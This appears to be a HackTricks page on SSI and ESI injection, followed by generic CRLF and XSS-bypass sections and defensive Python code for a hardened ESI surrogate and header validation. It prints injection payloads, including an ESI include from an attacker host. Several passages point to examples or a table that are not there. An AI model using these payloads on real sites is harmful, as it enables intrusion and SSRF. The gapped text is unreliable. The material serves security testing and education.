<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF**, check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
SSI (Server Side Includes) are directives that are **placed in HTML pages and evaluated on the server** while the pages are being served. They let you **add dynamically generated content** to an existing HTML page without having to serve the entire page via a CGI program or another dynamic technology.\
For example, you could place a directive into an existing HTML page, such as:
The decision of when to use SSI, and when to have your page entirely generated by some program, is usually a matter of how much of the page is static and how much needs to be recomputed every time the page is served. SSI is a great way to add small pieces of information, such as the current time, as shown above. But if most of your page is being generated at the time it is served, you need to look for some other solution.
To check for Server-Side Inclusion (SSI) and Edge-Side Inclusion (ESI) Injection vulnerabilities, you can follow these steps:
1. **Identify the target**: Determine the target website or application that you want to test for SSI or ESI Injection vulnerabilities.
2. **Inspect the source code**: Analyze the source code of the target application to identify any potential SSI or ESI injection points. Look for server-side scripting languages like PHP, ASP, or JSP, as they are commonly used for SSI or ESI.
3. **Test for SSI Injection**: Inject SSI directives into user-controllable input fields, such as URL parameters or form inputs, to see if they are processed by the server. Use SSI directives like `<!--#include virtual="file.txt" -->` to include external files or execute commands.
4. **Test for ESI Injection**: Inject ESI directives into user-controllable input fields, such as URL parameters or form inputs, to see if they are processed by the server. Use ESI directives like `<esi:include src="http://attacker.com/malicious.xml" />` to include external content or execute commands.
5. **Observe the response**: Analyze the server's response to determine if the injected SSI or ESI directives are executed or if any error messages or unusual behavior occurs.
6. **Exploit the vulnerability**: If the SSI or ESI injection is successful, try to exploit the vulnerability further by including sensitive files, executing commands, or accessing restricted areas of the application.
7. **Report and mitigate**: Document your findings and report them to the appropriate parties. Provide recommendations on how to mitigate the SSI or ESI Injection vulnerabilities, such as input validation and output encoding.
By following these steps, you can effectively test for and exploit Server-Side Inclusion and Edge-Side Inclusion Injection vulnerabilities in web applications.
There is a problem with **caching information or dynamic applications**, as part of the content may **have changed** by the next time the content is retrieved. This is what **ESI** is for: marking, with ESI tags, the **dynamic content that needs to be generated** before the cached version is sent.\
If an **attacker** is able to **inject an ESI tag** into the cached content, then he may be able to **inject arbitrary content** into the document before it is sent to the users.
[GoSecure created](https://www.gosecure.net/blog/2018/04/03/beyond-xss-edge-side-include-injection/) a table to understand the possible attacks we can try against different ESI-capable software, depending on the functionality supported:
* **Includes**: Supports the `<esi:include>` directive
* **Vars**: Supports the `<esi:vars>` directive. Useful for bypassing XSS filters
* **Cookie**: Document cookies are accessible to the ESI engine
* **Upstream Headers Required**: Surrogate applications will not process ESI statements unless the upstream application provides the headers
* **Host Allowlist**: In this case, ESI includes are only possible from allowed server hosts, making SSRF, for example, only possible against those hosts
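As an added example (not code from the page or from GoSecure), the defensive side of the testing steps and of the table above in Python: a toy surrogate that resolves `<esi:include>` only when the origin opted in with a `Surrogate-Control` header and only for allowlisted hosts, plus a check and an encoder for user-supplied fragments so that SSI/ESI markers are inert before they reach a cacheable page. `fetch` is an assumed callback standing in for the surrogate's HTTP client; the host names in the usage are constructed.

```python
import html
import re
from urllib.parse import urlsplit

# <esi:include src="..."/> as used by surrogates; SSI directives use the <!--#cmd ... --> form
ESI_INCLUDE = re.compile(r'<esi:include\s+src="([^"]*)"[^>]*>', re.IGNORECASE)
ANY_DIRECTIVE = re.compile(r'<esi:\w+|<!--\s*#\w+', re.IGNORECASE)


def contains_directive(text):
    """True if user-supplied text carries an SSI or ESI directive marker."""
    return ANY_DIRECTIVE.search(text) is not None


def safe_fragment(user_text):
    """HTML-encode user text before it is stored in a cacheable page, so that
    '<esi:' and '<!--#' can no longer be parsed as directives by the surrogate."""
    return html.escape(user_text, quote=True)


def process_esi(body, upstream_headers, fetch, host_allowlist):
    """Resolve <esi:include> tags the way a hardened surrogate would.

    - Without an upstream Surrogate-Control opt-in the tags are left inert
      (the "Upstream Headers Required" row of the table).
    - Targets whose host is not on the allowlist are removed, never fetched
      (the "Host Allowlist" row; this is what limits ESI-based SSRF).
    `fetch(url)` is an assumed callback returning the fragment body as a string.
    Returns (rendered_body, rejected_sources).
    """
    control = upstream_headers.get("Surrogate-Control", "")
    if "ESI/1.0" not in control:
        return body, []
    rejected = []

    def replace(match):
        src = match.group(1)
        host = urlsplit(src).hostname
        if host is None or host.lower() not in host_allowlist:
            rejected.append(src)
            return ""
        return fetch(src)

    return ESI_INCLUDE.sub(replace, body), rejected
```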
Some web applications implement client-side XSS protection mechanisms to prevent the execution of malicious scripts in the browser. These protections are usually implemented using Content Security Policy (CSP) headers or JavaScript libraries like DOMPurify.
However, it is possible to bypass these client-side XSS protections by finding and exploiting vulnerabilities in the server-side code. This can be done by injecting malicious code that will be executed on the server and then reflected back to the client.
##### Exploitation:
To bypass client XSS protection, you can try the following techniques:
1. Server-Side Inclusion (SSI) Injection: If the web application uses Server-Side Includes (SSI) to dynamically include content, you can try injecting malicious code into the included file. This code will be executed on the server and then reflected back to the client, bypassing the client-side XSS protection.
2. Edge-Side Includes (ESI) Injection: If the web application uses Edge-Side Includes (ESI) to include content from different sources, you can try injecting malicious code into the included content. This code will be executed on the server and then reflected back to the client, bypassing the client-side XSS protection.
##### Prevention:
To prevent bypassing client XSS protection, you should:
- Implement server-side input validation and sanitization to prevent injection attacks.
- Use a web application firewall (WAF) to detect and block malicious requests.
- Regularly update and patch the server-side code to fix any vulnerabilities that could be exploited.
- Educate developers about secure coding practices and the risks associated with XSS attacks.
CRLF (Carriage Return Line Feed) is a special character sequence that represents the end of a line in various operating systems, including Windows. It consists of two characters: a carriage return (CR) and a line feed (LF).
In the context of web security, CRLF injection refers to a type of attack where an attacker injects CRLF characters into user input fields or HTTP headers to manipulate the behavior of the web application or server. This can lead to various security vulnerabilities, such as HTTP response splitting, session hijacking, or server-side request forgery.
To prevent CRLF injection attacks, it is important to properly validate and sanitize user input, especially when it is used in HTTP headers or other sensitive parts of the application. Additionally, web developers should ensure that the application's response headers are correctly encoded to prevent any unintended interpretation of CRLF characters.
By understanding CRLF injection and implementing appropriate security measures, web applications can be better protected against this type of attack.
There is a CRLF (Carriage Return Line Feed) flaw in the site's header-setting functionality. This flaw can lead to attacks that inject content into the page's header. Such an attack can have serious consequences, such as leakage of sensitive information, execution of illegitimate JavaScript code, or even control of the server.
To confirm the presence of this flaw, you can try adding CRLF characters (%0d%0a) to an HTTP request header. If those characters appear in the header of the received page, then a CRLF attack is likely possible.
##### Attacks
CRLF attacks can be carried out by injecting illegitimate content into the page header. This can lead to various outcomes, such as leakage of sensitive information, execution of illegitimate JavaScript code, or even control of the server.
##### Prevention
To prevent CRLF attacks, it is important to thoroughly check header insertion. Make sure to remove CRLF characters from input data before displaying it on the page. Also, use security tools such as a WAF (Web Application Firewall) to block CRLF attacks.
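An added example, not from the page, of the header check described above in Python: a redirect builder that percent-decodes the user-influenced value and rejects it if it contains CR or LF, beside the unvalidated concatenation it replaces, and a small parser showing which headers a client would accept from the split response. The `X-Injected` header name and the paths in the usage are constructed.

```python
import re
from urllib.parse import unquote

CR_OR_LF = re.compile(r"[\r\n]")


def build_redirect(headers, target):
    """Set Location from a user-influenced value, refusing CR/LF.

    The value is percent-decoded first because many frameworks decode %0d%0a
    before the string reaches the header layer, so checking the raw form only
    would miss the encoded variant. Rejecting is preferred to stripping: a
    stripped value is still attacker-shaped and harder to audit later.
    """
    decoded = unquote(target)
    if CR_OR_LF.search(decoded):
        raise ValueError("CR/LF in Location value rejected")
    headers["Location"] = decoded
    return headers


def unvalidated_redirect(target):
    """The vulnerable pattern, kept for comparison: raw concatenation into the
    header block, which is exactly what response splitting relies on."""
    return "HTTP/1.1 302 Found\r\nLocation: " + unquote(target) + "\r\n\r\n"


def header_names_seen_by_client(raw_response):
    """Parse the header block of a raw response the way an HTTP client does
    and return the header names it would honour. Shows how one injected
    %0d%0a turns a single header into two."""
    head = raw_response.split("\r\n\r\n", 1)[0]
    names = []
    for line in head.split("\r\n")[1:]:  # skip the status line
        if ":" in line:
            names.append(line.split(":", 1)[0].strip())
    return names
```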
By supplying the value `xslt` in the _dca_ parameter, it is possible to include **`eXtensible Stylesheet Language Transformations (XSLT)`**-based ESI. The inclusion causes the HTTP surrogate to retrieve XML and XSLT files, where the XSLT filters the XML. Such XML files can be used for _XML External Entity (XXE)_ attacks, allowing attackers to perform SSRF attacks. However, the usefulness of this approach is limited, since ESI already serves as an SSRF vector. Due to lack of support in the Xalan library, external DTDs are not processed, preventing local file extraction.